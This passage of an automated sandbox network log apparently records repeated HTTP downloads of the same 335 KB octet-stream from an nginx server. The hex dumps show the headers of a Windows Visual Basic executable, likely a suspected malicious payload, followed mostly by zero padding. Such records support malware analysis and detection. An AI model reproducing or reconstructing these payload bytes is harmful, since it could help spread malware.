00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:47:15 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:47:16 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:47:18 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:47:24 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:47:24 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:47:32 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:47:36 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 